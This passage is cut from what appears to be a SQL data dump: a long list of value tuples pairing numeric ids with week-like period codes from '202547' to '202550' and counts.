,'202547',7),(2609,1,'202547',7),(3027,1,'202547',7),(3030,1,'202547',7),(3041,1,'202547',7),(3096,1,'202547',7),(3097,1,'202547',7),(3282,1,'202547',7),(3438,1,'202547',7),(3724,1,'202547',7),(4387,1,'202547',7),(4404,1,'202547',7),(4668,1,'202547',7),(4700,1,'202547',7),(4874,1,'202547',7),(4897,1,'202547',7),(4980,1,'202547',7),(4983,1,'202547',7),(5024,1,'202547',7),(5033,1,'202547',7),(5320,1,'202547',7),(1600,1,'202547',8),(1770,1,'202547',8),(1776,1,'202547',8),(2178,1,'202547',8),(2993,1,'202547',8),(3004,1,'202547',8),(3072,1,'202547',8),(3117,1,'202547',8),(3124,1,'202547',8),(3727,1,'202547',8),(4238,1,'202547',8),(4341,1,'202547',8),(4420,1,'202547',8),(4457,1,'202547',8),(4546,1,'202547',8),(4556,1,'202547',8),(4663,1,'202547',8),(4709,1,'202547',8),(5268,1,'202547',8),(5323,1,'202547',8),(5472,1,'202547',8),(110,1,'202547',9),(3102,1,'202547',9),(3109,1,'202547',9),(3307,1,'202547',9),(3489,1,'202547',9),(4587,1,'202547',9),(4654,1,'202547',9),(4688,1,'202547',9),(4697,1,'202547',9),(4712,1,'202547',9),(4722,1,'202547',9),(4744,1,'202547',9),(4976,1,'202547',9),(4977,1,'202547',9),(5054,1,'202547',9),(5128,1,'202547',9),(5140,1,'202547',9),(5561,1,'202547',9),(5582,1,'202547',9),(87,1,'202547',10),(473,1,'202547',10),(1584,1,'202547',10),(1604,1,'202547',10),(1713,1,'202547',10),(2769,1,'202547',10),(3069,1,'202547',10),(3316,1,'202547',10),(3430,1,'202547',10),(3479,1,'202547',10),(3482,1,'202547',10),(4329,1,'202547',10),(4529,1,'202547',10),(4551,1,'202547',10),(4681,1,'202547',10),(4996,1,'202547',10),(5062,1,'202547',10),(5163,1,'202547',10),(5359,1,'202547',10),(5464,1,'202547',10),(74,1,'202547',11),(487,1,'202547',11),(1594,1,'202547',11),(1610,1,'202547',11),(1701,1,'202547',11),(1766,1,'202547',11),(3045,1,'202547',11),(3253,1,'202547',11),(3777,1,'202547',11),(4400,1,'202547',11),(4436,1,'202547',11),(4776,1,'202547',11),(5071,1,'202547',11),(5125,1,'202547',11),(5292,1,'202547',11),(5301,1,'202547',11),(5578,1,'202547',11),(1602,1,'202547',12),(3038,1,'202547',12),(3066,1,'202547',12),(3721,1,'202547',12),(4335,1,'202547',12),(4514,1,'202547',12),(4612,1,'202547',12),(4660,1,'202547',12),(4750,1,'202547',12),(5134,1,'202547',12),(5412,1,'202547',12),(5449,1,'202547',12),(5492,1,'202547',12),(5567,1,'202547',12),(1737,1,'202547',13),(2503,1,'202547',13),(3749,1,'202547',13),(4893,1,'202547',13),(4930,1,'202547',13),(5310,1,'202547',13),(5317,1,'202547',13),(5433,1,'202547',13),(5489,1,'202547',13),(5585,1,'202547',13),(1598,1,'202547',14),(1612,1,'202547',14),(1751,1,'202547',14),(2804,1,'202547',14),(2956,1,'202547',14),(5157,1,'202547',14),(5363,1,'202547',14),(5512,1,'202547',14),(570,1,'202547',15),(1614,1,'202547',15),(1724,1,'202547',15),(1780,1,'202547',15),(3313,1,'202547',15),(5425,1,'202547',15),(5461,1,'202547',15),(1606,1,'202547',16),(2309,1,'202547',16),(2809,1,'202547',16),(3764,1,'202547',16),(5400,1,'202547',16),(335,1,'202547',17),(2658,1,'202547',17),(5307,1,'202547',17),(5515,1,'202547',17),(468,1,'202547',18),(3023,1,'202547',18),(3297,1,'202547',18),(108,1,'202547',19),(3083,1,'202547',19),(4520,1,'202547',19),(5076,1,'202547',19),(5441,1,'202547',19),(84,1,'202547',20),(469,1,'202547',20),(5593,1,'202547',20),(5601,1,'202547',20),(2775,1,'202547',21),(2904,1,'202547',21),(5259,1,'202547',21),(5280,1,'202547',21),(1608,1,'202547',22),(1778,1,'202547',22),(5454,1,'202547',22),(1588,1,'202547',23),(1695,1,'202547',23),(5436,1,'202547',23),(91,1,'202547',24),(3060,1,'202547',24),(5457,1,'202547',24),(5502,1,'202547',24),(474,1,'202547',26),(1586,1,'202547',26),(5415,1,'202547',26),(5570,1,'202547',27),(2813,1,'202547',30),(1544,1,'202547',31),(5397,1,'202547',33),(5409,1,'202547',33),(89,1,'202547',34),(5406,1,'202547',35),(76,1,'202547',38),(2297,1,'202547',39),(2704,1,'202547',40),(5428,1,'202547',40),(5420,1,'202547',41),(1728,1,'202547',42),(3781,1,'202547',44),(467,1,'202547',46),(72,1,'202547',47),(5598,1,'202547',47),(5605,1,'202547',48),(68,1,'202547',61),(470,1,'202547',62),(1582,1,'202547',74),(80,1,'202547',1704),(9,1,'202547',3913),(479,1,'202548',4),(1776,1,'202548',4),(4444,1,'202548',4),(482,1,'202548',5),(1590,1,'202548',5),(1592,1,'202548',5),(1743,1,'202548',5),(4428,1,'202548',5),(4792,1,'202548',5),(488,1,'202548',6),(2293,1,'202548',6),(2296,1,'202548',6),(3226,1,'202548',6),(3249,1,'202548',6),(3265,1,'202548',6),(4408,1,'202548',6),(4454,1,'202548',6),(4802,1,'202548',6),(4862,1,'202548',6),(5024,1,'202548',6),(5472,1,'202548',6),(5582,1,'202548',6),(102,1,'202548',7),(106,1,'202548',7),(481,1,'202548',7),(1739,1,'202548',7),(1749,1,'202548',7),(1751,1,'202548',7),(2156,1,'202548',7),(2159,1,'202548',7),(2748,1,'202548',7),(2991,1,'202548',7),(3041,1,'202548',7),(3243,1,'202548',7),(3245,1,'202548',7),(3251,1,'202548',7),(3271,1,'202548',7),(3742,1,'202548',7),(4275,1,'202548',7),(4373,1,'202548',7),(4387,1,'202548',7),(4391,1,'202548',7),(4587,1,'202548',7),(5046,1,'202548',7),(5256,1,'202548',7),(478,1,'202548',8),(1707,1,'202548',8),(1715,1,'202548',8),(1732,1,'202548',8),(1768,1,'202548',8),(2148,1,'202548',8),(2161,1,'202548',8),(2558,1,'202548',8),(3072,1,'202548',8),(3096,1,'202548',8),(3109,1,'202548',8),(3127,1,'202548',8),(3247,1,'202548',8),(3253,1,'202548',8),(3275,1,'202548',8),(3479,1,'202548',8),(3724,1,'202548',8),(3752,1,'202548',8),(4368,1,'202548',8),(5050,1,'202548',8),(5058,1,'202548',8),(5067,1,'202548',8),(5071,1,'202548',8),(1697,1,'202548',9),(1713,1,'202548',9),(1745,1,'202548',9),(1782,1,'202548',9),(3240,1,'202548',9),(3257,1,'202548',9),(3261,1,'202548',9),(3267,1,'202548',9),(3269,1,'202548',9),(3285,1,'202548',9),(3290,1,'202548',9),(3727,1,'202548',9),(4326,1,'202548',9),(4377,1,'202548',9),(4404,1,'202548',9),(4412,1,'202548',9),(4420,1,'202548',9),(4591,1,'202548',9),(4765,1,'202548',9),(4858,1,'202548',9),(4976,1,'202548',9),(4996,1,'202548',9),(5080,1,'202548',9),(480,1,'202548',10),(483,1,'202548',10),(486,1,'202548',10),(1600,1,'202548',10),(1695,1,'202548',10),(1709,1,'202548',10),(1726,1,'202548',10),(1734,1,'202548',10),(1772,1,'202548',10),(2150,1,'202548',10),(2248,1,'202548',10),(2804,1,'202548',10),(2989,1,'202548',10),(3066,1,'202548',10),(3087,1,'202548',10),(3229,1,'202548',10),(3263,1,'202548',10),(3273,1,'202548',10),(3714,1,'202548',10),(4323,1,'202548',10),(4382,1,'202548',10),(4396,1,'202548',10),(4432,1,'202548',10),(4448,1,'202548',10),(4546,1,'202548',10),(4566,1,'202548',10),(4608,1,'202548',10),(4651,1,'202548',10),(4709,1,'202548',10),(4759,1,'202548',10),(4797,1,'202548',10),(4888,1,'202548',10),(4988,1,'202548',10),(5020,1,'202548',10),(5137,1,'202548',10),(5561,1,'202548',10),(5585,1,'202548',10),(471,1,'202548',11),(1596,1,'202548',11),(1699,1,'202548',11),(1722,1,'202548',11),(1737,1,'202548',11),(1747,1,'202548',11),(2751,1,'202548',11),(2993,1,'202548',11),(3063,1,'202548',11),(3287,1,'202548',11),(3430,1,'202548',11),(3541,1,'202548',11),(3735,1,'202548',11),(3749,1,'202548',11),(3764,1,'202548',11),(4301,1,'202548',11),(4357,1,'202548',11),(4440,1,'202548',11),(4706,1,'202548',11),(4756,1,'202548',11),(4878,1,'202548',11),(5054,1,'202548',11),(5134,1,'202548',11),(5304,1,'202548',11),(5307,1,'202548',11),(5314,1,'202548',11),(5323,1,'202548',11),(5374,1,'202548',11),(5383,1,'202548',11),(1720,1,'202548',12),(1730,1,'202548',12),(1766,1,'202548',12),(1770,1,'202548',12),(1774,1,'202548',12),(1778,1,'202548',12),(2154,1,'202548',12),(2809,1,'202548',12),(2911,1,'202548',12),(2964,1,'202548',12),(3005,1,'202548',12),(3027,1,'202548',12),(3034,1,'202548',12),(3259,1,'202548',12),(3278,1,'202548',12),(3280,1,'202548',12),(3746,1,'202548',12),(3777,1,'202548',12),(4238,1,'202548',12),(4612,1,'202548',12),(4654,1,'202548',12),(4663,1,'202548',12),(4768,1,'202548',12),(4771,1,'202548',12),(4866,1,'202548',12),(4870,1,'202548',12),(4893,1,'202548',12),(4897,1,'202548',12),(5122,1,'202548',12),(5131,1,'202548',12),(5153,1,'202548',12),(5330,1,'202548',12),(5353,1,'202548',12),(484,1,'202548',13),(487,1,'202548',13),(2152,1,'202548',13),(2801,1,'202548',13),(3069,1,'202548',13),(3079,1,'202548',13),(3092,1,'202548',13),(3482,1,'202548',13),(3486,1,'202548',13),(3489,1,'202548',13),(3531,1,'202548',13),(3721,1,'202548',13),(3738,1,'202548',13),(4363,1,'202548',13),(4542,1,'202548',13),(4657,1,'202548',13),(4668,1,'202548',13),(4674,1,'202548',13),(4677,1,'202548',13),(4685,1,'202548',13),(4703,1,'202548',13),(4747,1,'202548',13),(4762,1,'202548',13),(5028,1,'202548',13),(5042,1,'202548',13),(5157,1,'202548',13),(5264,1,'202548',13),(5271,1,'202548',13),(5301,1,'202548',13),(5317,1,'202548',13),(5326,1,'202548',13),(5356,1,'202548',13),(473,1,'202548',14),(477,1,'202548',14),(1602,1,'202548',14),(2165,1,'202548',14),(2178,1,'202548',14),(2252,1,'202548',14),(2609,1,'202548',14),(2965,1,'202548',14),(3004,1,'202548',14),(3097,1,'202548',14),(3107,1,'202548',14),(3124,1,'202548',14),(3282,1,'202548',14),(3534,1,'202548',14),(3710,1,'202548',14),(3731,1,'202548',14),(4329,1,'202548',14),(4338,1,'202548',14),(4424,1,'202548',14),(4681,1,'202548',14),(4688,1,'202548',14),(4694,1,'202548',14),(4700,1,'202548',14),(4712,1,'202548',14),(4753,1,'202548',14),(5037,1,'202548',14),(5125,1,'202548',14),(5128,1,'202548',14),(5140,1,'202548',14),(5248,1,'202548',14),(5292,1,'202548',14),(5412,1,'202548',14),(1594,1,'202548',15),(1703,1,'202548',15),(1711,1,'202548',15),(2063,1,'202548',15),(3104,1,'202548',15),(3316,1,'202548',15),(3438,1,'202548',15),(3771,1,'202548',15),(4514,1,'202548',15),(4524,1,'202548',15),(4529,1,'202548',15),(4645,1,'202548',15),(4750,1,'202548',15),(4883,1,'202548',15),(4977,1,'202548',15),(5033,1,'202548',15),(5295,1,'202548',15),(5334,1,'202548',15),(5489,1,'202548',15),(5601,1,'202548',15),(5609,1,'202548',15),(110,1,'202548',16),(476,1,'202548',16),(485,1,'202548',16),(570,1,'202548',16),(1724,1,'202548',16),(3038,1,'202548',16),(3307,1,'202548',16),(3498,1,'202548',16),(4416,1,'202548',16),(4517,1,'202548',16),(4582,1,'202548',16),(4660,1,'202548',16),(4691,1,'202548',16),(5268,1,'202548',16),(5320,1,'202548',16),(5359,1,'202548',16),(1705,1,'202548',17),(1741,1,'202548',17),(2309,1,'202548',17),(2617,1,'202548',17),(3023,1,'202548',17),(3117,1,'202548',17),(4400,1,'202548',17),(4648,1,'202548',17),(4697,1,'202548',17),(4980,1,'202548',17),(5101,1,'202548',17),(5289,1,'202548',17),(5464,1,'202548',17),(5467,1,'202548',17),(5492,1,'202548',17),(5570,1,'202548',17),(472,1,'202548',18),(1701,1,'202548',18),(2297,1,'202548',18),(2956,1,'202548',18),(4556,1,'202548',18),(4983,1,'202548',18),(5280,1,'202548',18),(5363,1,'202548',18),(5378,1,'202548',18),(74,1,'202548',19),(1606,1,'202548',19),(1612,1,'202548',19),(2658,1,'202548',19),(3006,1,'202548',19),(3045,1,'202548',19),(3090,1,'202548',19),(4332,1,'202548',19),(4744,1,'202548',19),(5567,1,'202548',19),(1780,1,'202548',20),(2457,1,'202548',20),(4341,1,'202548',20),(4436,1,'202548',20),(4551,1,'202548',20),(4741,1,'202548',20),(4776,1,'202548',20),(5253,1,'202548',20),(5310,1,'202548',20),(5415,1,'202548',20),(5515,1,'202548',20),(468,1,'202548',21),(1584,1,'202548',21),(2769,1,'202548',21),(3297,1,'202548',21),(3313,1,'202548',21),(4874,1,'202548',21),(5062,1,'202548',21),(5146,1,'202548',21),(5163,1,'202548',21),(5512,1,'202548',21),(1614,1,'202548',22),(1718,1,'202548',22),(2503,1,'202548',22),(3030,1,'202548',22),(5298,1,'202548',22),(5461,1,'202548',22),(5578,1,'202548',22),(3083,1,'202548',23),(4335,1,'202548',23),(4457,1,'202548',23),(4520,1,'202548',23),(4930,1,'202548',23),(5400,1,'202548',23),(5436,1,'202548',23),(5626,1,'202548',23),(335,1,'202548',24),(3774,1,'202548',24),(4722,1,'202548',24),(5441,1,'202548',24),(5454,1,'202548',24),(5593,1,'202548',24),(1610,1,'202548',26),(5076,1,'202548',26),(5433,1,'202548',26),(2775,1,'202548',27),(2813,1,'202548',27),(5449,1,'202548',27),(84,1,'202548',28),(5259,1,'202548',28),(87,1,'202548',29),(469,1,'202548',29),(1586,1,'202548',29),(1588,1,'202548',29),(5409,1,'202548',29),(5425,1,'202548',29),(1598,1,'202548',30),(1608,1,'202548',30),(3102,1,'202548',30),(2904,1,'202548',32),(1728,1,'202548',35),(3060,1,'202548',35),(5605,1,'202548',35),(108,1,'202548',36),(3781,1,'202548',36),(5502,1,'202548',37),(5598,1,'202548',37),(474,1,'202548',38),(5397,1,'202548',41),(5406,1,'202548',41),(5457,1,'202548',43),(5420,1,'202548',45),(91,1,'202548',46),(89,1,'202548',47),(1544,1,'202548',47),(5636,1,'202548',49),(76,1,'202548',50),(1604,1,'202548',53),(5428,1,'202548',53),(2704,1,'202548',55),(72,1,'202548',65),(467,1,'202548',65),(1582,1,'202548',71),(68,1,'202548',85),(470,1,'202548',99),(5276,1,'202548',105),(80,1,'202548',725),(9,1,'202548',2971),(106,1,'202549',1),(1709,1,'202549',1),(1720,1,'202549',1),(2248,1,'202549',1),(4332,1,'202549',1),(4416,1,'202549',1),(4551,1,'202549',1),(4648,1,'202549',1),(1739,1,'202549',2),(1741,1,'202549',2),(3275,1,'202549',2),(3714,1,'202549',2),(3771,1,'202549',2),(4329,1,'202549',2),(4591,1,'202549',2),(4645,1,'202549',2),(4654,1,'202549',2),(4677,1,'202549',2),(1695,1,'202549',3),(1697,1,'202549',3),(1749,1,'202549',3),(2154,1,'202549',3),(2252,1,'202549',3),(3092,1,'202549',3),(3531,1,'202549',3),(3534,1,'202549',3),(3721,1,'202549',3),(3774,1,'202549',3),(4238,1,'202549',3),(4301,1,'202549',3),(4326,1,'202549',3),(4396,1,'202549',3),(4432,1,'202549',3),(4448,1,'202549',3),(4651,1,'202549',3),(4797,1,'202549',3),(5042,1,'202549',3),(5289,1,'202549',3),(1747,1,'202549',4),(1782,1,'202549',4),(2296,1,'202549',4),(2558,1,'202549',4),(2748,1,'202549',4),(2751,1,'202549',4),(2964,1,'202549',4),(3066,1,'202549',4),(3243,1,'202549',4),(3263,1,'202549',4),(3273,1,'202549',4),(3479,1,'202549',4),(3727,1,'202549',4),(4338,1,'202549',4),(4357,1,'202549',4),(4382,1,'202549',4),(4391,1,'202549',4),(4404,1,'202549',4),(4428,1,'202549',4),(4454,1,'202549',4),(4524,1,'202549',4),(4582,1,'202549',4),(4771,1,'202549',4),(5037,1,'202549',4),(5046,1,'202549',4),(5101,1,'202549',4),(5128,1,'202549',4),(5137,1,'202549',4),(5292,1,'202549',4),(478,1,'202549',5),(485,1,'202549',5),(1699,1,'202549',5),(1730,1,'202549',5),(1732,1,'202549',5),(1737,1,'202549',5),(1768,1,'202549',5),(2161,1,'202549',5),(2178,1,'202549',5),(2989,1,'202549',5),(3004,1,'202549',5),(3030,1,'202549',5),(3079,1,'202549',5),(3096,1,'202549',5),(3107,1,'202549',5),(3245,1,'202549',5),(3269,1,'202549',5),(3287,1,'202549',5),(3498,1,'202549',5),(3710,1,'202549',5),(3731,1,'202549',5),(3746,1,'202549',5),(4373,1,'202549',5),(4400,1,'202549',5),(4444,1,'202549',5),(4514,1,'202549',5),(4517,1,'202549',5),(4685,1,'202549',5),(4802,1,'202549',5),(4858,1,'202549',5),(4862,1,'202549',5),(4897,1,'202549',5),(4996,1,'202549',5),(5020,1,'202549',5),(5050,1,'202549',5),(5054,1,'202549',5),(5122,1,'202549',5),(5131,1,'202549',5),(5248,1,'202549',5),(5314,1,'202549',5),(5317,1,'202549',5),(5330,1,'202549',5),(5359,1,'202549',5),(5609,1,'202549',5),(472,1,'202549',6),(480,1,'202549',6),(482,1,'202549',6),(483,1,'202549',6),(486,1,'202549',6),(1590,1,'202549',6),(1596,1,'202549',6),(1707,1,'202549',6),(1713,1,'202549',6),(1715,1,'202549',6),(1734,1,'202549',6),(2063,1,'202549',6),(2148,1,'202549',6),(2150,1,'202549',6),(2293,1,'202549',6),(2911,1,'202549',6),(2965,1,'202549',6),(3124,1,'202549',6),(3127,1,'202549',6),(3226,1,'202549',6),(3229,1,'202549',6),(3247,1,'202549',6),(3267,1,'202549',6),(3282,1,'202549',6),(3316,1,'202549',6),(3482,1,'202549',6),(3724,1,'202549',6),(3752,1,'202549',6),(4368,1,'202549',6),(4387,1,'202549',6),(4440,1,'202549',6),(4694,1,'202549',6),(4697,1,'202549',6),(4700,1,'202549',6),(4703,1,'202549',6),(4706,1,'202549',6),(4747,1,'202549',6),(4768,1,'202549',6),(4792,1,'202549',6),(4870,1,'202549',6),(4878,1,'202549',6),(4888,1,'202549',6),(5024,1,'202549',6),(5080,1,'202549',6),(5134,1,'202549',6),(5146,1,'202549',6),(5153,1,'202549',6),(5307,1,'202549',6),(5310,1,'202549',6),(5374,1,'202549',6),(102,1,'202549',7),(471,1,'202549',7),(479,1,'202549',7),(481,1,'202549',7),(1606,1,'202549',7),(1711,1,'202549',7),(1726,1,'202549',7),(1745,1,'202549',7),(1774,1,'202549',7),(1776,1,'202549',7),(2809,1,'202549',7),(2991,1,'202549',7),(2993,1,'202549',7),(3063,1,'202549',7),(3109,1,'202549',7),(3257,1,'202549',7),(3278,1,'202549',7),(3280,1,'202549',7),(3430,1,'202549',7),(3541,1,'202549',7),(3742,1,'202549',7),(4275,1,'202549',7),(4363,1,'202549',7),(4424,1,'202549',7),(4520,1,'202549',7),(4529,1,'202549',7),(4542,1,'202549',7),(4587,1,'202549',7),(4657,1,'202549',7),(4688,1,'202549',7),(4741,1,'202549',7),(4759,1,'202549',7),(4765,1,'202549',7),(4866,1,'202549',7),(4988,1,'202549',7),(5071,1,'202549',7),(5253,1,'202549',7),(5271,1,'202549',7),(5301,1,'202549',7),(5320,1,'202549',7),(1703,1,'202549',8),(1705,1,'202549',8),(1743,1,'202549',8),(1751,1,'202549',8),(1770,1,'202549',8),(2609,1,'202549',8),(2956,1,'202549',8),(3034,1,'202549',8),(3072,1,'202549',8),(3090,1,'202549',8),(3104,1,'202549',8),(3240,1,'202549',8),(3251,1,'202549',8),(3261,1,'202549',8),(3438,1,'202549',8),(3738,1,'202549',8),(3777,1,'202549',8),(4546,1,'202549',8),(4608,1,'202549',8),(4722,1,'202549',8),(4744,1,'202549',8),(5163,1,'202549',8),(5304,1,'202549',8),(5383,1,'202549',8),(5472,1,'202549',8),(5585,1,'202549',8),(477,1,'202549',9),(488,1,'202549',9),(1594,1,'202549',9),(1701,1,'202549',9),(1718,1,'202549',9),(1772,1,'202549',9),(2152,1,'202549',9),(2165,1,'202549',9),(3023,1,'202549',9),(3027,1,'202549',9),(3087,1,'202549',9),(3097,1,'202549',9),(3117,1,'202549',9),(3265,1,'202549',9),(3271,1,'202549',9),(3285,1,'202549',9),(3313,1,'202549',9),(3489,1,'202549',9),(4323,1,'202549',9),(4377,1,'202549',9),(4408,1,'202549',9),(4660,1,'202549',9),(4709,1,'202549',9),(4750,1,'202549',9),(4883,1,'202549',9),(4893,1,'202549',9),(5140,1,'202549',9),(5157,1,'202549',9),(5264,1,'202549',9),(5295,1,'202549',9),(5326,1,'202549',9),(5334,1,'202549',9),(110,1,'202549',10),(476,1,'202549',10),(484,1,'202549',10),(1722,1,'202549',10),(1724,1,'202549',10),(2156,1,'202549',10),(3038,1,'202549',10),(3041,1,'202549',10),(3249,1,'202549',10),(3290,1,'202549',10),(4566,1,'202549',10),(4681,1,'202549',10),(4712,1,'202549',10),(4756,1,'202549',10),(4977,1,'202549',10),(5378,1,'202549',10),(5425,1,'202549',10),(5467,1,'202549',10),(5492,1,'202549',10),(5561,1,'202549',10),(5567,1,'202549',10),(5626,1,'202549',10),(1610,1,'202549',11),(1766,1,'202549',11),(2159,1,'202549',11),(2804,1,'202549',11),(3006,1,'202549',11),(4412,1,'202549',11),(4668,1,'202549',11),(4691,1,'202549',11),(4976,1,'202549',11),(5256,1,'202549',11),(5353,1,'202549',11),(5363,1,'202549',11),(5605,1,'202549',11),(2617,1,'202549',12),(3005,1,'202549',12),(3486,1,'202549',12),(4753,1,'202549',12),(4762,1,'202549',12),(5067,1,'202549',12),(5512,1,'202549',12),(4335,1,'202549',13),(4420,1,'202549',13),(4436,1,'202549',13),(4612,1,'202549',13),(4776,1,'202549',13),(4874,1,'202549',13),(5268,1,'202549',13),(5298,1,'202549',13),(5356,1,'202549',13),(5464,1,'202549',13),(5582,1,'202549',13),(473,1,'202549',14),(1592,1,'202549',14),(1600,1,'202549',14),(2801,1,'202549',14),(3045,1,'202549',14),(3083,1,'202549',14),(3259,1,'202549',14),(3297,1,'202549',14),(3307,1,'202549',14),(3735,1,'202549',14),(3749,1,'202549',14),(4674,1,'202549',14),(5028,1,'202549',14),(1598,1,'202549',15),(1780,1,'202549',15),(2457,1,'202549',15),(3069,1,'202549',15),(3764,1,'202549',15),(4980,1,'202549',15),(5593,1,'202549',15),(487,1,'202549',16),(1604,1,'202549',16),(4663,1,'202549',16),(5033,1,'202549',16),(5125,1,'202549',16),(5280,1,'202549',16),(5323,1,'202549',16),(5449,1,'202549',16),(5454,1,'202549',16),(1614,1,'202549',17),(4341,1,'202549',17),(5433,1,'202549',17),(108,1,'202549',18),(2769,1,'202549',18),(5058,1,'202549',18),(5412,1,'202549',18),(5415,1,'202549',18),(5570,1,'202549',18),(4983,1,'202549',19),(5409,1,'202549',19),(5461,1,'202549',19),(570,1,'202549',20),(1602,1,'202549',20),(1728,1,'202549',20),(2309,1,'202549',20),(2775,1,'202549',20),(2813,1,'202549',20),(5578,1,'202549',20),(87,1,'202549',21),(468,1,'202549',21),(1584,1,'202549',21),(1612,1,'202549',21),(1778,1,'202549',21),(3102,1,'202549',21),(4556,1,'202549',21),(5441,1,'202549',21),(2658,1,'202549',22),(4930,1,'202549',22),(5400,1,'202549',22),(5489,1,'202549',22),(5515,1,'202549',22),(1588,1,'202549',23),(2503,1,'202549',23),(5436,1,'202549',23),(5598,1,'202549',24),(5076,1,'202549',25),(5601,1,'202549',25),(2297,1,'202549',26),(5259,1,'202549',26),(84,1,'202549',27),(335,1,'202549',27),(474,1,'202549',27),(4457,1,'202549',27),(5062,1,'202549',27),(5457,1,'202549',27),(469,1,'202549',28),(74,1,'202549',29),(1586,1,'202549',29),(1608,1,'202549',30),(5406,1,'202549',30),(3253,1,'202549',32),(5636,1,'202549',32),(5428,1,'202549',35),(1544,1,'202549',36),(91,1,'202549',39),(5397,1,'202549',39),(3060,1,'202549',41),(2904,1,'202549',42),(5502,1,'202549',43),(89,1,'202549',45),(3781,1,'202549',45),(5420,1,'202549',48),(467,1,'202549',52),(68,1,'202549',56),(2704,1,'202549',59),(1582,1,'202549',70),(5662,1,'202549',72),(72,1,'202549',73),(470,1,'202549',76),(5276,1,'202549',133),(76,1,'202549',167),(80,1,'202549',1190),(9,1,'202549',3302),(1732,1,'202550',1),(4870,1,'202550',1),(5050,1,'202550',1),(5378,1,'202550',1),(1734,1,'202550',2),(1770,1,'202550',2),(3240,1,'202550',2),(3249,1,'202550',2),(3531,1,'202550',2),(4888,1,'202550',2),(4897,1,'202550',2),(106,1,'202550',3),(1715,1,'202550',3),(1730,1,'202550',3),(1772,1,'202550',3),(2156,1,'202550',3),(2964,1,'202550',3),(3005,1,'202550',3),(3735,1,'202550',3),(4709,1,'202550',3),(4768,1,'202550',3),(5253,1,'202550',3),(5301,1,'202550',3),(5383,1,'202550',3),(1713,1,'202550',4),(1747,1,'202550',4),(2159,1,'202550',4),(2748,1,'202550',4),(2993,1,'202550',4),(3006,1,'202550',4),(3063,1,'202550',4),(3104,1,'202550',4),(3109,1,'202550',4),(3245,1,'202550',4),(3263,1,'202550',4),(3316,1,'202550',4),(3534,1,'202550',4),(3724,1,'202550',4),(3738,1,'202550',4),(4566,1,'202550',4),(4582,1,'202550',4),(4587,1,'202550',4),(4648,1,'202550',4),(4685,1,'202550',4),(4747,1,'202550',4),(4792,1,'202550',4),(5037,1,'202550',4),(5271,1,'202550',4),(5320,1,'202550',4),(5326,1,'202550',4),(484,1,'202550',5),(1697,1,'202550',5),(1709,1,'202550',5),(1741,1,'202550',5),(2293,1,'202550',5),(2956,1,'202550',5),(2991,1,'202550',5),(3247,1,'202550',5),(3282,1,'202550',5),(4275,1,'202550',5),(4357,1,'202550',5),(4368,1,'202550',5),(4377,1,'202550',5),(4524,1,'202550',5),(4591,1,'202550',5),(4762,1,'202550',5),(4866,1,'202550',5),(4878,1,'202550',5),(5020,1,'202550',5),(5042,1,'202550',5),(5314,1,'202550',5),(5353,1,'202550',5),(5374,1,'202550',5),(477,1,'202550',6),(480,1,'202550',6),(485,1,'202550',6),(1596,1,'202550',6),(1707,1,'202550',6),(1743,1,'202550',6),(1780,1,'202550',6),(1782,1,'202550',6),(2161,1,'202550',6),(2252,1,'202550',6),(2617,1,'202550',6),(2965,1,'202550',6),(3027,1,'202550',6),(3087,1,'202550',6),(3124,1,'202550',6),(3127,1,'202550',6),(3243,1,'202550',6),(3271,1,'202550',6),(3278,1,'202550',6),(3489,1,'202550',6),(3710,1,'202550',6),(3731,1,'202550',6),(3749,1,'202550',6),(4326,1,'202550',6),(4341,1,'202550',6),(4373,1,'202550',6),(4382,1,'202550',6),(4408,1,'202550',6),(4517,1,'202550',6),(4520,1,'202550',6),(4542,1,'202550',6),(4759,1,'202550',6),(4893,1,'202550',6),(5054,1,'202550',6),(5080,1,'202550',6),(5298,1,'202550',6),(102,1,'202550',7),(482,1,'202550',7),(1590,1,'202550',7),(1701,1,'202550',7),(1703,1,'202550',7),(1745,1,'202550',7),(2063,1,'202550',7),(2150,1,'202550',7),(2165,1,'202550',7),(3030,1,'202550',7),(3034,1,'202550',7),(3041,1,'202550',7),(3066,1,'202550',7),(3107,1,'202550',7),(3226,1,'202550',7),(3257,1,'202550',7),(3267,1,'202550',7),(3742,1,'202550',7),(4338,1,'202550',7),(4396,1,'202550',7),(4404,1,'202550',7),(4424,1,'202550',7),(4546,1,'202550',7),(4654,1,'202550',7),(4663,1,'202550',7),(4674,1,'202550',7),(4694,1,'202550',7),(4700,1,'202550',7),(4744,1,'202550',7),(4858,1,'202550',7),(5024,1,'202550',7),(5122,1,'202550',7),(5268,1,'202550',7),(476,1,'202550',8),(478,1,'202550',8),(1695,1,'202550',8),(1749,1,'202550',8),(2148,1,'202550',8),(2154,1,'202550',8),(2248,1,'202550',8),(2609,1,'202550',8),(2911,1,'202550',8),(2989,1,'202550',8),(3079,1,'202550',8),(3097,1,'202550',8),(3265,1,'202550',8),(3269,1,'202550',8),(3273,1,'202550',8),(3275,1,'202550',8),(3287,1,'202550',8),(3290,1,'202550',8),(3727,1,'202550',8),(3746,1,'202550',8),(4332,1,'202550',8),(4335,1,'202550',8),(4363,1,'202550',8),(4432,1,'202550',8),(4448,1,'202550',8),(4688,1,'202550',8),(4703,1,'202550',8),(4712,1,'202550',8),(4741,1,'202550',8),(4753,1,'202550',8),(4765,1,'202550',8),(4802,1,'202550',8),(4862,1,'202550',8),(4883,1,'202550',8),(4988,1,'202550',8),(4996,1,'202550',8),(5128,1,'202550',8),(5317,1,'202550',8),(5467,1,'202550',8),(5472,1,'202550',8),(479,1,'202550',9),(483,1,'202550',9),(1592,1,'202550',9),(1720,1,'202550',9),(2751,1,'202550',9),(3004,1,'202550',9),(3069,1,'202550',9),(3259,1,'202550',9),(3280,1,'202550',9),(3430,1,'202550',9),(3438,1,'202550',9),(3541,1,'202550',9),(3771,1,'202550',9),(4387,1,'202550',9),(4412,1,'202550',9),(4454,1,'202550',9),(4514,1,'202550',9),(4551,1,'202550',9),(4608,1,'202550',9),(4651,1,'202550',9),(4697,1,'202550',9),(4797,1,'202550',9),(5071,1,'202550',9),(5140,1,'202550',9),(5256,1,'202550',9),(5289,1,'202550',9),(5295,1,'202550',9),(5304,1,'202550',9),(5334,1,'202550',9),(5363,1,'202550',9),(471,1,'202550',10),(487,1,'202550',10),(570,1,'202550',10),(1606,1,'202550',10),(1699,1,'202550',10),(1726,1,'202550',10),(1739,1,'202550',10),(1768,1,'202550',10),(1776,1,'202550',10),(2152,1,'202550',10),(3072,1,'202550',10),(3090,1,'202550',10),(3092,1,'202550',10),(3251,1,'202550',10),(3285,1,'202550',10),(3482,1,'202550',10),(3714,1,'202550',10),(3774,1,'202550',10),(4301,1,'202550',10),(4329,1,'202550',10),(